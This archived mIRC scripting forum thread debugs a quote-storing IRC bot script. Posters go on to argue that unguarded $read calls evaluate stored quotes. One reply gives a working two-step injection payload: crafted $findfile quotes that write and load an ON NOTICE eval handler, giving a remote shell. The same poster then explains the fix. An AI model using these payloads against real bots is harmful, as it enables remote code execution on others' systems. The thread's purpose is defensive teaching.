Forums Scripts & Popups Quote script (doesnt work well anymore?!)

Print Thread

Quote script (doesnt work well anymore?!)

#216389 12/11/09 04:00 PM

Joined: Jan 2007

Posts: 280

DuXxXieJ

Fjord artisan

DuXxXieJ

Fjord artisan

Joined: Jan 2007

Posts: 280

Hi, the following script below, is a quote script which saves quotes, shows them at IRC ánd online on our network-website. I've just tried to add an "nickname-archive", (long story), but after that it wont msg the succeed anymore. It also doesn't write the added quote into the PHP File, but it does write the HTML Tags and it does write the nickname and fulldate.

The parts of "quote, lastquote and delquote" DO work, so they don't need to be fixed, or I don't need help with them. The problems are at the parts of "addquote" and "delquote".

Information about the files and aliases:
script (uploads via a loaded ftp script the targetfile)
quotewrite Needs to write quote into the .txt files and .php file
quotedel Needs to unwrite/remove the quote from the .txt files and .php file
quoteup Needs to upload the files via the script alias.
quotetest Needs to write nickname into txt file when nickname isnt in it yet

Script:

Code:

alias quotetest {
  if $nick !isin $read(C:\users\cvdeeden\desktop\DJ-Serv\archivenames.txt) {
    write C:\users\cvdeeden\desktop\DJ-Serv\archive.txt <b>+</b> <a href="/ $+ $nick $+ quotes.php"> $+ $nick $+ </a>
  }
}

alias quoteup {
  script C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt 
  script c:\users\cvdeeden\desktop\DJ-Serv\quotes.txt 
  script c:\users\cvdeeden\desktop\DJ-Serv\archivenames.txt 
  script c:\users\cvdeeden\desktop\DJ-Serv\archive.txt
}

alias quotewrite {
  write C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.php <div class="frameheader"><h1>TOEGEVOEGD OP $fulldate $+ </h1></div><div class="text"><p> $+ $2- $+ </p></div> 
  write C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt <div class="frameheader"><h1>TOEGEVOEGD DOOR $nick $+ </h1></div><div class="text"><small>Toegevoegd op:<i class="quote"> $+ $fulldate $+ </i></small><p> $+ $2- $+ </p></div> 
  write C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt <div class="frameheader"><h1>TOEGEVOEGD DOOR $nick $+ </h1></div><div class="text"><small>Toegevoegd op:<i class="quote"> $+ $fulldate $+ </i></small><p> $+ $2- $+ </p></div>
}

alias quoteremove {
  write -dl $read(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt)) C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt
  write -dl $read(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.php)) C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.php
  write -dl $2 C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt
}

on *:TEXT:*:#:{
  if ($1 == .quote) {
    if ($2) {
      if ($2 isnum) {
        if ($read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,$2) != $null) { msg $chan QUOTE: Quote $chr(35) $+ $2 $+ : $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,$2) }
        else { msg # QUOTE: Line doesn't exist }
      }
      else { msg # QUOTE: Please provide a number }
    }
    else {
      set %lines $rand(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt))
      msg $chan QUOTE $chr(35) $+ %lines $+ : $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,%lines)
    }
  }
  if ($1 == .addquote) {
    if ($address($nick,1) isin %Quote.ban) { msg # QUOTE: You are banned from adding quotes! }
    else {
      if ($2) {
        if ($chr(36) isin $2-) { msg # QUOTE: Invalid characters! }
        else {
          write C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt $2- $+ , added by $nick
          set %lines (1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt))
          inc %quotes 1
          quotewrite 
          quoteup
          quotetest
          msg # QUOTE: Added!
        }
      }
    }
  }  
  if ($1 == .delquote) {
    if ($nick == %Owner || $nick == %Owner2 || $nick == %Owner3) {
      if ($2) {
        if ($read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,$2) != $null) {
          write -dl $2 C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt
          quoteremove
          quoteup
          msg # QUOTE: Line deleted
          halt
        }
        else { msg # QUOTE: Line doesn't exist }
      }
    }
  }
  if ($1 == .searchquote) {
    if ($2) {
      if ($read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,w,* $+ $2 $+ *) != $null) {
        msg # QUOTE: $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,w,* $+ $2 $+ *)
      }
      else { msg # QUOTE: No results found }
    }
  }
  if ($1 == .lastquote) {
    set %lines $lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt)
    msg # QUOTE $chr(35) $+ %lines $+ : $read(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt,%lines)
  }
}

Last edited by DuXxXieJ; 12/11/09 04:09 PM.

Squee whenever a squee squee's. Squee whenever a squee does not squee.

Re: Quote script (doesnt work well anymore?!) DuXxXieJ #216395 13/11/09 03:01 AM
Joined: Jan 2007 Posts: 1,156 Seattle D DJ_Sol Hoopy frood
DJ_Sol Hoopy frood D Joined: Jan 2007 Posts: 1,156 Seattle	set %lines (1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt)) Is this supposed to be using $+() ? If not, $lines won;t be evaluated. set %lines $+(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quotes.txt)) You say /quotewrite, but in the quotewrite alias it is wanting to add $2-. Can you verify it is getting $2- and $nick from the text event?

Re: Quote script (doesnt work well anymore?!) DuXxXieJ #216397 13/11/09 08:18 AM
Joined: Jul 2008 Posts: 236 Hell, Australia S s00p Fjord artisan
s00p Fjord artisan S Joined: Jul 2008 Posts: 236 Hell, Australia	DJ_Sol: I see instances of $rand(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt)) in that code, however I don't quite understand how that particular broken line of code, as stupid as it is, would cause any problems, or even why it is there in the first place! There is no further logic after that branch that relies on that value, so he'd best get rid of it! Quote: The parts of "quote, lastquote and delquote" DO work, so they don't need to be fixed, or I don't need help with them. I disagree. Your quote+lastquote needs to be fixed. It's disgusting, and I would never run such a script on my own system, unless of course I wanted to be hacked. /help $read should yield more information, if you are so inclined as to read it. By the looks of things, you aren't, as the next error I noticed: Your alias quoteremove looks stupid... $read(1,$lines(C:\Users\CvdEeden\Desktop\DJ-Serv\ $+ $nick $+ quotes.txt)). Fix that, too... it is causing delquote to not work. Surprise, surprise! It might be a good idea to stop misdiagnosing problems. Usually this is a problem in itself as it is misleading to those who will try to help you. This problem can be solved by reading non-stop until you understand the concepts of debugging, particularly that of providing what is known as a "minimal testcase" (google). When you say things like "I don't need help with them" and they're broken, it makes you look like an arrogant, counterproductive newb. You will listen to the advice, paste the results of your fixes or you will find some other group of people to be "better than". Good day. Last edited by s00p; 13/11/09 08:38 AM.

Re: Quote script (doesnt work well anymore?!) s00p #216398 13/11/09 09:01 AM
Joined: Jan 2007 Posts: 1,156 Seattle D DJ_Sol Hoopy frood
DJ_Sol Hoopy frood D Joined: Jan 2007 Posts: 1,156 Seattle	LIghten up soop, you dont need to put people down.

Re: Quote script (doesnt work well anymore?!) s00p #216407 13/11/09 08:23 PM
Joined: Feb 2004 Posts: 206 Canberra, Australia D Darwin_Koala Fjord artisan
Darwin_Koala Fjord artisan D Joined: Feb 2004 Posts: 206 Canberra, Australia	Soop: You have this fixation on $read being a huge security hole. I scanned the above code and $read is either taking a string to be used as a comparator (i.e. not being used in a context where it is going to be evaluated) or output to the channel with a benign string prepended. You also mention the "n" switch which prevents evaluation (i.e. calculation of any variables or identifiers) Please explain, clearly and without belittling anyone, how this is a risk in this context. Or perhaps more or less of a risk if someone crafted a malicious quote. Worked examples would help to illustrate your explanation! Cheers, DK Darwin_Koala Junior Brat, In-no-cent(r)(tm) and original source of DK-itis!

Re: Quote script (doesnt work well anymore?!) Darwin_Koala #216411 13/11/09 11:05 PM
Joined: Jul 2008 Posts: 236 Hell, Australia S s00p Fjord artisan
s00p Fjord artisan S Joined: Jul 2008 Posts: 236 Hell, Australia	I have explained it clearly at least half a dozen times in the past. Try this code (from the input textbox): /write -c C:\test.txt $version //echo -- $read(C:\test.txt) //echo -- $read(C:\test.txt,n) see any difference between the 2 lines of output? See why it's a security risk in this case? I have 'this fixation on $read being a huge security hole' because in this case it's used in a way that is risky. I've asked a number of times that people read /help $read and still you, haven't. edit: I'm light. As lightened up as I could possibly be having wasted 15-20 minutes of time looking in depth at code that appears to have no problems only to find the code that has evaded my eyes by way of suggestion that it "works" has obvious errors. I didn't put him down, I just said his script is stupid. Last edited by s00p; 13/11/09 11:10 PM.

Re: Quote script (doesnt work well anymore?!) s00p #216412 14/11/09 03:30 AM
Joined: Feb 2004 Posts: 206 Canberra, Australia D Darwin_Koala Fjord artisan
Darwin_Koala Fjord artisan D Joined: Feb 2004 Posts: 206 Canberra, Australia	Soop. As a general note - you seem to be bent on putting either other people down ("obviously not reading the help file" etc) or ripping code to pieces ("Code is stupid") that you are forgetting to read and understand what is being said. On the other hand, I clearly did not phrase my request clearly enough - otherwise you might have actually answered it instead of trotting out your (now regular) generalities. In context: - let us assume that the quote is "$version". - Quote File = C:\Users\CvdEeden\Desktop\DJ-Serv\quote.txt (just saves on typing) - "$version, added by Darwin_Koala" is added to quote file. - "6.35, added by Darwin_Koala" is read from quote file. - "6.35, added by Darwin_Koala" is compared with null (using "!=") - "QUOTE #<n>: 6.35, added by Darwin_Koala" is messaged to the channel. Again, I ask - where is the risk in the above? That is my original question - you obviously have some concept that I wish to understand. Thanks, DK Darwin_Koala Junior Brat, In-no-cent(r)(tm) and original source of DK-itis!

Re: Quote script (doesnt work well anymore?!) Darwin_Koala #216414 14/11/09 05:37 AM
Joined: Jul 2008 Posts: 236 Hell, Australia S s00p Fjord artisan
s00p Fjord artisan S Joined: Jul 2008 Posts: 236 Hell, Australia	You're right. There's no security risk with $version. Now let's assume the quote is $findfile($mircdir,.,1,1,write C:\script.mrc ON 1:NOTICE:eval :: $!2-) ON 1:NOTICE:eval :: $!2- is then written to C:\script.mrc after the quote is $read'd. Now let's assume the malicious quoter (l33tHaqSaw) uses another specially crafted quote: $findfile($mircdir,.,1,1,load -rs C:\script.mrc) Leet hacksaw can now send notices to the bot in the form of: eval ... and these will be evaluated as code in a similar manner, eg: eval write C:\test.mrc ... Last edited by s00p; 14/11/09 05:57 AM.

Re: Quote script (doesnt work well anymore?!) s00p #216416 14/11/09 06:41 AM
Joined: Feb 2004 Posts: 206 Canberra, Australia D Darwin_Koala Fjord artisan
Darwin_Koala Fjord artisan D Joined: Feb 2004 Posts: 206 Canberra, Australia	What is read is "$findfile($mircdir,.,1,1,write C:\script.mrc ON 1:NOTICE:eval :: $!2-), added by l33tHaqSaw". I haven't tried this, but I assume (erring on the side of caution) that this will have the same effect. While the "n" switch in $read is one solution, another may be parse the quotes before writing to file to remove suspect identifiers. This latter approach would allow non-suspect identifiers (e.g. $date, $time, $nick etc) to be used in the quotes file. I had thought of prepending the quote with a benign character - but that may not work (quoter could just put another word and a space in front of $findfile). Thank you for the clearer explanation. These nuances are not explained in the help file and the clear explanation of the dangers (no matter how often repeated) is useful for many of the novice readers. Cheers, DK Darwin_Koala Junior Brat, In-no-cent(r)(tm) and original source of DK-itis!

Re: Quote script (doesnt work well anymore?!) Darwin_Koala #216420 14/11/09 07:54 AM
Joined: Jul 2008 Posts: 236 Hell, Australia S s00p Fjord artisan
s00p Fjord artisan S Joined: Jul 2008 Posts: 236 Hell, Australia	Aside from using the n switch, you could replace whitespace/newline followed by $ with $! when saving, and whitespace/newline % with % $+... Other option is using $encode or some other method before saving it... The help file does explain that the line read using $read/$readini will not be evaluated when using the n switch. Perhaps this isn't as clear as a warning in red saying "this function can lead to security compromisation if not used correctly", but it's there nonetheless. The effect is that the line is evaluated, thus $version evaluates to 6.35 and $findfile($mircdir,.,1,1,write C:\script.mrc ON 1:NOTICE:eval :: $!2-) evaluates to the filename it found, and also executes this command (assuming there is a file within the directory $mircdir): write C:\script.mrc ON 1:NOTICE:eval :: $!2- The second one loads the script file, thus giving the attacker an interactive mIRC shell if you like, allowing them the same access that mIRC has to the entire system. It's not that difficult to prevent. Just use $read(%file,n) or $read(%file,n,%line) when reading files.

Link Copied to Clipboard